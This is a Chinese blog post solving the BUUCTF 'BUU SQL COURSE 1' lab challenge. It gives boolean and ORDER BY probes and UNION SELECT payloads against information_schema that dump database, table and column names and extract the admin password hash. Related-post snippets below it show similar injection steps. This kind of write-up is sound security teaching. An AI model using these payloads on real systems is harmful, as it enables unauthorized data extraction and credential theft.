BUU SQL COURSE 1 1(SQL注入)

已于 2022-10-25 21:41:11 修改
阅读量2.8k 收藏 13
点赞数 4
分类专栏: 网络安全 文章标签: sql php web渗透 CTF 数据库
于 2022-10-25 21:40:32 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_46201544/article/details/127522264
版权

题目链接

https://buuoj.cn/challenges#BUU%20SQL%20COURSE%201

思路

我们先看登录界面,然后试一下各种万能密码,发现并没有用

在这里插入图片描述

然后我们点开热点中的热点一,我们发现这里有一个php的请求,于是我们猜测是否这里会有sql注入,于是我们开始尝试

在这里插入图片描述
开始测试
http://98b868b9-ddcf-4645-951c-274472fae642.node4.buuoj.cn:81/backend/content_detail.php?id=1%20and%201=1,发现还是正常的数据
在这里插入图片描述

http://98b868b9-ddcf-4645-951c-274472fae642.node4.buuoj.cn:81/backend/content_detail.php?id=1%20and%201=2

发现此时,数据就不回显了,那么很显然这里存在sql注入

在这里插入图片描述
通过order by 确定数据的条数,我们发现当order by 3 的时候,数据不在回显,而当数字小于等于 2 2 2 的时候会发生回显,于是数据确定为两列

在这里插入图片描述
在这里插入图片描述
接下来就是一个流程了,暴库、暴表、暴字段、爆密码

暴库:(information_schema,ctftraining,mysql,performance_schema,test,news)
?id=-1 UNION SELECT 1,group_concat(schema_name) from information_schema.schemata

暴表:(admin,contents)
?id=-1 UNION SELECT 1,group_concat(table_name) from information_schema.tables where table_schema="news"

暴字段:(id,username,password)
?id=-1 UNION SELECT 1,group_concat(column_name) from information_schema.columns where table_name="admin"

暴密码:(983a3f6bc1f3709f9f8997f887ef9803)
?id=-1 UNION SELECT 1,concat(username,0x3a,password) from admin

于是我们找到了admin的密码:983a3f6bc1f3709f9f8997f887ef9803

登录账号即可获得flag

flag{614439de-3e96-45fc-bc67-10165bc60690}

在这里插入图片描述

MangataTS
关注
  • 4
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
BUU 论坛的编辑器163Editor
09-21
BUU 论坛的编辑器DianUbb.rar
web-sql注入
m0_52682586的博客
08-07 199
(做题记录)
CTF练习】BUU SQL COURSE 1,2024年最新网络安全开发6年了
最新发布
2401_84253089的博客
04-10 736
当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。id=-1 的使用是为了确保原始查询返回一个空集,从而避免与注入部分有重叠的数据。观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。
1ncrd#Study-Record#BUUCTF[第二章 web进阶]XSS闯关1.md
08-10
一些关于xss的payload
Majin Buu Top HD Anime New Tabs Theme-crx插件
03-15
每次打开一个新选项卡,您将获得Majin Buu提供的不同高清壁纸 这个新主题包括时钟等等。 魔鬼的布欧(the devil,Buu),日本动漫《七龙珠》中的义与恶的角色,是《七龙珠》综合实力最强的BOSS。 这个名字来自电影“灰姑娘”中的咒语“ Bibidi Barbidibou”,分为三个,Bibi是制片人,Babidi是去除魔鬼印记的人,Buu成了魔鬼的名字。 以下是您将获得的其他功能的列表:-待办事项列表-设置您喜欢的壁纸-发现新的热点-书签-社交网络通知-每个新标签的高品质壁纸-时钟显示日期和时间-天气小部件-打开搜索 支持语言:English,中文 (简体),中文 (繁體)
POSN:POSN-BUU的源代码
04-01
POSN POSN-BUU的源代码
SQLi-LABS 1-22关(Basic Challenges) 手动注入--(缓慢更新中 12/22)
燕麦葡萄干的博客
11-18 3416
首先判断注入类型,分别使用?时间注入是利用sleep()或benchmark()等函数让MySQL的执行时间变长,时间盲注多与if(expr1,expr2,expr3)结合使用,此if语句意思为:如果expr1是TRUE,则if()的返回值是expr2;进入到MySQL所在目录,我这里是D:\software\phpstudy_pro\Extensions\MySQL5.7.26\bin,目录栏直接输入cmd调出cmd终端,输入mysql -u root -p ,然后输入密码即可成功登陆数据库
BUUCTFBUU SQL COURSE 1 1
qq_41369524的博客
12-10 1266
进到burp里面看:id=1,id=2。推断可能是根据SQL查询得到的不同界面结果。例如select * from 表名 where id=1;再试一次,发现原来是之前粘贴少了一个字母,成功拿到flag。试试3,试试2,发现2有回显,所以试探出该表有两列。看到了username和password。先审题,题目名字应该是关于SQL注入的。没有结果,考虑一下MD5解密,解不了。在界面随便点点,发现是POST。首先,判断其是字符型还是数字型。返回结果相同,所以是数字型。得到用户名是admin。
BUUCTFBUU SQL COURSE 1
weixin_63442046的博客
04-28 1261
关于BUU SQL COURSE 1的思路
BUU SQL COURSE 1
qq_51902218的博客
08-25 2127
1. 观察页面,只有两块主要内容,热点和登录 2. 测试登录,发现貌似没用存在注入点 3. 高度怀疑热点 ,这时候,我们打开火狐浏览器,用f12,选择网络看一下有什么猫腻 状态码200:请求已成功,请求所希望的响应头或数据体将随此响应返回。即返回的数据为全量的数据,如果文件不通过GZIP压缩的话,文件是多大,则要有多大传输量。 状态码304:如果客户端发送了一个带条件的 GET 请求且该请求已被允许,而文档的内容(自上次访问以来或者根据请求的条件)并没有改变,则服务器应当返回这个状态码...
The HMT effects on the nucleon collective flows in BUU transport model
03-14
基于BUU模型利用集体流研究HMT效应,张芳,,基于半经典的BUU输运模型,我们利用中-质微分流、中子-质子流之差以及质子椭圆流研究了核内核子动量分布的高动量尾巴(HMT)效应。研
BUUCTF Basic 解题记录--BUU SQL COURSE 1
weixin_43171033的博客
09-14 1348
BUUCTF Basic 解题记录--BUU SQL COURSE 1
CTF练习】BUU SQL COURSE 1
m0_73866435的博客
01-30 517
首先根据题目sql,那么我想着肯定考的是sql注入吧,那么页面显示有4个可点击,
注入攻击(一)--------SQL注入(结合BUUCTF sqli-labs)
Young12138的博客
05-10 1747
为了准备信息安全技术课程汇报做的笔记,想着做了也是做了,不如分享出来给想我一样的初学者学习。本人之前没有做过CTF,也没有学过SQL注入,零基础,所以大佬可以先行离开。内容是SQL注入XPath注入HTML注入
Buuctf | BUU SQL COURSE 1
m_de_g的博客
12-27 5681
BUU SQL COURSE 1 一、题目下载 https://buuoj.cn/challenges#BUU%20SQL%20COURSE%201 二、实战化演练 1.直接使用弱口令来进行测试 2.经过多次的测试,都无法注入,说明这个是写死的注册和登录,左边不是有热点吗?查看了一下跳转 3.通过访问backend/content_detail.php?id=1 4.通过修改后面的id=1,2,3,均会返回信息,直接使用SQL查询语句 1 and 1=1 5.我们尝试使用 1 and 1=2
SQL注入buuctf web入门sql注入2)
weixin_44214568的博客
07-13 1825
1.启动靶机: 2.进入login.php界面 ps:界面没有注入口,因为这个题目是sql注入,尝试输入常规的login界面,进入了login界面 我们学习ctf,在基础阶段还是要抛开脑洞,掌握并且形成一套破解模式 3.查看源代码 这个源代码里面有用的信息就是?tips=1,但是加到url后面也没什么效果 4.抓包吧 尝试了一下普通的注入没有啥用 5.先用burpsuit查看数据库 注入语句 1' and updatexml(1,concat(0x7e,(select data
BUU SQL COURSE 11
WEB渗透测试 从入门到萌新
04-19 1209
打开之后 F12查看 http://7a0c2d1a-3ae3-4815-850d-9e229cef2e1f.node4.buuoj.cn:81/backend/content_detail.php?id=1 找到注入点 sql手工注入流程 1、判断注入类型 ?id=1 or 1=1 ?id=1' or '1'='1 2、判断列数:?id=1 order by 1,2,3 3、判断注入点:?id=-1 union select 1?id=-1 union select 1,2,3 ..

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

MangataTS

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值